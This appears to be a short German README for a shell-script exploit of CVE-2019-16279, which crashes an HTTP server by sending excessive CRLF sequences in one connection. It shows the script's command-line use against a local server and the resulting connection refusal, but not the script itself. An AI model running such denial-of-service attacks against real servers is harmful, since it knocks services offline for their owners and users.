
Shell-Skript-Exploit für CVE-2019-16279, der einen Denial-of-Service durch Speicherkorruption auslöst, indem übermäßige CRLF-Sequenzen an einen HTTP-Server gesendet werden.
(CVE-2019-16279)DoS Dieser Fehler nutzt einen Speicherfehler aus, wenn in einer einzigen Verbindung zu viele \r\n gesendet werden.
Beispiel
$ curl http://127.0.0.1:8080 HELLO! $ ./CVE-2019-16279.sh 127.0.0.1 8080 $ curl http://127.0.0.1:8080 curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused